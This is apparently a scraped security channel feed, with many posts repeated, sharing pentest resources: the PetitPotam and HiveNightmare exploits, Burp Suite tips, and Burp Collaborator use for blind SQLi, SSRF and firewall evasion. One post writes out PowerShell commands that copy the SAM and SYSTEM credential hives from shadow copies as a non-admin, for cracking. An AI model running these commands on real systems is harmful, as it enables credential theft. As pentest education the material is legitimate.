PetitPotam
PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw function.
https://github.com/topotam/PetitPotam
#pentest #PetitPotam #rcp
PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw function.
https://github.com/topotam/PetitPotam
#pentest #PetitPotam #rcp
GitHub
GitHub - topotam/PetitPotam: PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw…
PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions. - topotam/PetitPotam
#BurpHacksForBounties - Day 18/30
Do you want to filter the responses in Burp Suite Intruder? And only show the ones which have specific pattern present in response?
If yes try this 👇🏻 🧵
#appsec #infosec #bugbountytips #bugbountytip #burp
Do you want to filter the responses in Burp Suite Intruder? And only show the ones which have specific pattern present in response?
If yes try this 👇🏻 🧵
#appsec #infosec #bugbountytips #bugbountytip #burp
1. Create a filter for intruder response.
2. Start the payload
3. If the response contains the string you entered in "grep" that will show up in an extra column.
-> You can only focus on the response you are looking for.
2. Start the payload
3. If the response contains the string you entered in "grep" that will show up in an extra column.
-> You can only focus on the response you are looking for.
Burp Suite - ninja tricks
https://owasp.org/www-chapter-norway/assets/files/Burp%20suite%20ninja%20moves.pdf
#burp #tricks #BugBounty
https://owasp.org/www-chapter-norway/assets/files/Burp%20suite%20ninja%20moves.pdf
#burp #tricks #BugBounty
🔥 HiveNightmare 🔥
Exploit allowing you to read registry hives and SAM data (sensitive) in Windows 10, as well as the SYSTEM and SECURITY hives as non-admin.
This exploit uses VSC to extract the SAM, SYSTEM, and SECURITY hives even when in use, and saves them in current directory as HIVENAME-haxx, for use with whatever cracking tools, or whatever, you want.
https://github.com/GossiTheDog/HiveNightmare
#redteam #pentest #vuln #nightmare
Exploit allowing you to read registry hives and SAM data (sensitive) in Windows 10, as well as the SYSTEM and SECURITY hives as non-admin.
This exploit uses VSC to extract the SAM, SYSTEM, and SECURITY hives even when in use, and saves them in current directory as HIVENAME-haxx, for use with whatever cracking tools, or whatever, you want.
https://github.com/GossiTheDog/HiveNightmare
#redteam #pentest #vuln #nightmare
GitHub
GitHub - GossiTheDog/HiveNightmare: Exploit allowing you to read registry hives as non-admin on Windows 10 and 11
Exploit allowing you to read registry hives as non-admin on Windows 10 and 11 - GossiTheDog/HiveNightmare
#BurpHacksForBounties - Tip 19/30
Adding your own scan rules to Burp Suite active/passive scanner. Include custom checks in scanner for #bugbounties without writing a single line of code.
Using a plugin developed by @BurpBounty @egarme
#infosec #appsec #burp #bugbountytips
Adding your own scan rules to Burp Suite active/passive scanner. Include custom checks in scanner for #bugbounties without writing a single line of code.
Using a plugin developed by @BurpBounty @egarme
#infosec #appsec #burp #bugbountytips
Plugin name: BurpBounty Scan Check Builder.
It is fairly easy-to-use plugin. Install from BApp Store, create a check with simple name. Give it a severity, check enter the req/res you want to perform/check and enable it. ❤️
It is fairly easy-to-use plugin. Install from BApp Store, create a check with simple name. Give it a severity, check enter the req/res you want to perform/check and enable it. ❤️
APT
🔥 HiveNightmare 🔥 Exploit allowing you to read registry hives and SAM data (sensitive) in Windows 10, as well as the SYSTEM and SECURITY hives as non-admin. This exploit uses VSC to extract the SAM, SYSTEM, and SECURITY hives even when in use, and saves…
WINDOWS LPE "HiveNightmare" or "SeriousSAM"
1) Check permissions:
3) Copy SAM and SYSTEM files from shadow copy:
CVE-2021-36934
The problem is aggravated by the fact the 'shadow copy' of the system drive where these files can be found is created when someone performs a Windows Update if that drive is larger than 128GB (!). So, even if your version of Windows 10 wasn't initially impacted, it could be after updating.1) Check permissions:
icacls.exe C:\Windows\System32\config\SAM
2) Check shadow copies, restore points[System.IO.File]::Exists('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM')
[System.IO.File]::Exists('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SAM')
[System.IO.File]::Exists('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\System32\config\SAM')
... and so on3) Copy SAM and SYSTEM files from shadow copy:
[System.IO.File]::Copy('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM', 'C:\Temp\SAM')
[System.IO.File]::Copy('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM', 'C:\Temp\SYSTEM')#BurpHacksForBounties - Tip 20/30
Burp Suite shortcut's cheat sheet by ChrisADale published on SANS. This pocket guide will increase your productivity.
https://sansorg.egnyte.com/dd/x19ByeTOpS/
Burp Suite shortcut's cheat sheet by ChrisADale published on SANS. This pocket guide will increase your productivity.
https://sansorg.egnyte.com/dd/x19ByeTOpS/
#BurpHacksForBounties - Day 21/30
❤️ Burp Collaborator ❤️ 🙈
Burp Suite Collaborator is a hosted network service offering from PortSwigger which is very useful in manual testing.
See what, how, and why👇🏻
❤️ Burp Collaborator ❤️ 🙈
Burp Suite Collaborator is a hosted network service offering from PortSwigger which is very useful in manual testing.
See what, how, and why👇🏻
1/n when injection occurs with a payload that triggers interaction to some other site, to verify such scenarios this Collaborator comes in handy. Works on client-server model.
The public server hosted by PortSwigger. Self-hosting is possible too.
How to use a client? 👇🏻
The public server hosted by PortSwigger. Self-hosting is possible too.
How to use a client? 👇🏻
2/n
Image 1 - Start Collaborator client
Image 2 - Click copy a custom URL will be created with <>.burpcollaborator.net domain.
- Use that URL in the payload
Image 3 - Poll to see the request made on the URL.
Image 4 - Req payload
In my case: DNS, HTTP requests were made.
Image 1 - Start Collaborator client
Image 2 - Click copy a custom URL will be created with <>.burpcollaborator.net domain.
- Use that URL in the payload
Image 3 - Poll to see the request made on the URL.
Image 4 - Req payload
In my case: DNS, HTTP requests were made.
3/n
Useful in :
- Blind SQLi
- SSRF
- XSS
- Detecting any out-of-bound source loads you can think of.
- Evade firewall, incase outbound TCP requests are blocked and HTTP is allowed
Read more at:
https://portswigger.net/burp/documentation/collaborator
Useful in :
- Blind SQLi
- SSRF
- XSS
- Detecting any out-of-bound source loads you can think of.
- Evade firewall, incase outbound TCP requests are blocked and HTTP is allowed
Read more at:
https://portswigger.net/burp/documentation/collaborator
portswigger.net
Burp Collaborator - PortSwigger
Burp Collaborator is a network service that enables you to detect invisible vulnerabilities. These are vulnerabilities that don't: Trigger error messages. ...
Cheat sheet when designing offensive code
Source: https://raw.githubusercontent.com/OTRF/API-To-Event/master/images/API-to-Sysmon.svg
#redteam #sysmon
Source: https://raw.githubusercontent.com/OTRF/API-To-Event/master/images/API-to-Sysmon.svg
#redteam #sysmon